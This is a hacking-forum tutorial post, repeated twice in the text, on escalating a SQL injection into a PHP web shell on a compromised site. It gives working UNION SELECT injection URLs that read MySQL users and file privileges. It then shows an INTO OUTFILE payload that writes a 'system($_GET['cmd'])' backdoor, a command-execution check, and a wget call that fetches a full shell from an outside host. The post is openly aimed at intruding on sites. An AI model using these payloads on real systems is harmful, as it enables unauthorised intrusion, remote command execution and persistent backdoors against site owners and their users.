[Tutorial] Spawning a shell with SQLi 11-11-2012, 06:36 PM
#1
Hi all on AF,
So this will be a tutorial about how to spawn a shell with SQL Injection codes.
This method is quite rare and you can use it when u fail to upload shell on the site ( logged in as admin )
So lets continue with our tutorial
- This is what you need before starting
- Shell in .txt version ( you can google it or find it in our hacking section )
- Basic SQLi knowledge.
Now this will be our vulnerable site
Now imagine that you already hacked it and got infos. You logged in and fail to upload shell.
In your vulnerable column type in user and on the end of your code from mysql.user
So this is how it looks when you put it in url
- IF YOU GET ERROR HERE THIS WILL NOT WORK!!
Now you should get the user of the site. In our case siteowner ( remember this user )
Ok so now you need to see user file privilege.
Now insted of user put group_concat(user,0x3a,file_priv) and from mysql.user stays the same.
Our code should look like this
You should get a list with user(s) and file privilege of that user(s).
Remember our user was siteowner.
This is what you should get after entering the code
root:Y,root:Y,apache:N,siteowner:Y
This code tells us that we can make a file on site. To do that we need to find site path. Making and error should tell you where is it.
This is how its supose to look
/var/www/vhost/siteowner/data/www/vulnsite.com/
So after this you need to find writeable folder and its usually public_html but try to scan it with Acunetix.
Now lets say this is our
Ok now we will spawn our shell. Its easy just remember the row and code.
Now in your vuln column put this
Leave the question marks dont delete them.
Null other columns.
On the end INTO OUTFILE
All that looks like this
And after it use site path and writeable folder
/var/www/vhost/siteowner/data/www/vulnsite.com/shop/
Put it in your code above and add file name ( phpcmd.php )
It looks like this
Our shell should be spawned now and if you want to check it do this
If its working you need to get this warning
Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/ phpcmd.php on line #
That means our file is created. Now lets see files in our directory
After it download shell from site in .txt version with wget command and rename it with -O
Ok guy thats it, hope you've learned something from this tut.
If you find mistakes please let me know. I guess my grammar is good enough for you guys to read it.
-Crow
So this will be a tutorial about how to spawn a shell with SQL Injection codes.
This method is quite rare and you can use it when u fail to upload shell on the site ( logged in as admin )
So lets continue with our tutorial
- This is what you need before starting
- Shell in .txt version ( you can google it or find it in our hacking section )
- Basic SQLi knowledge.
Now this will be our vulnerable site
Code:
http://www.vulnsite.com/index.php?id=15Now imagine that you already hacked it and got infos. You logged in and fail to upload shell.
In your vulnerable column type in user and on the end of your code from mysql.user
So this is how it looks when you put it in url
Code:
http://www.vulnsite.com/index.php?id=-15 union select 1,2,3,user,5 from mysql.user--- IF YOU GET ERROR HERE THIS WILL NOT WORK!!
Now you should get the user of the site. In our case siteowner
( remember this user )Ok so now you need to see user file privilege.
Now insted of user put group_concat(user,0x3a,file_priv) and from mysql.user stays the same.
Our code should look like this
Code:
http://www.vulnsite.com/index.php?id=-15 union select 1,2,3,group_concat(user,0x3a,file_priv),5 from mysql.user--You should get a list with user(s) and file privilege of that user(s).
Remember our user was siteowner.
This is what you should get after entering the code
root:Y,root:Y,apache:N,siteowner:Y
This code tells us that we can make a file on site. To do that we need to find site path. Making and error should tell you where is it.
This is how its supose to look
/var/www/vhost/siteowner/data/www/vulnsite.com/
So after this you need to find writeable folder and its usually public_html but try to scan it with Acunetix.
Now lets say this is our
Code:
http://www.vulnsite.com/shop/Ok now we will spawn our shell. Its easy just remember the row and code.
Now in your vuln column put this
Code:
"<? system($_GET['cmd']); ?>"Leave the question marks dont delete them.
Null other columns.
On the end INTO OUTFILE
All that looks like this
Code:
http://www.vulnsite.com/index.php?id=-15 union select null,null,null,"<? system($_GET['cmd']); ?>",null INTO OUTFILE--And after it use site path and writeable folder
/var/www/vhost/siteowner/data/www/vulnsite.com/shop/
Put it in your code above and add file name ( phpcmd.php )
It looks like this
Code:
http://www.vulnsite.com/index.php?id=-15 union select null,null,null,"<? system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/siteowner/data/www/vulnsite.com/shop/phpcmd.php"--Our shell should be spawned now and if you want to check it do this
Code:
http://www.vulnsite.com/shop/phpcmd.phpIf its working you need to get this warning
Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/ phpcmd.php on line #
That means our file is created. Now lets see files in our directory
Code:
http://www.vulnsite.com/shop/phpcmd.php?cmd=ls -laAfter it download shell from site in .txt version with wget command and rename it with -O
Code:
http://www.vulnsite.com/shop/phpcmd.php?cmd=wget www.shell.com/shell.txt -O shell.phpOk guy thats it, hope you've learned something from this tut.
If you find mistakes please let me know. I guess my grammar is good enough for you guys to read it.
-Crow
![[Image: lupado1c3f2.png]](http://www.auplod.com/u/lupado1c3f2.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: yTHZBDS.png]](http://i.imgur.com/yTHZBDS.png)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)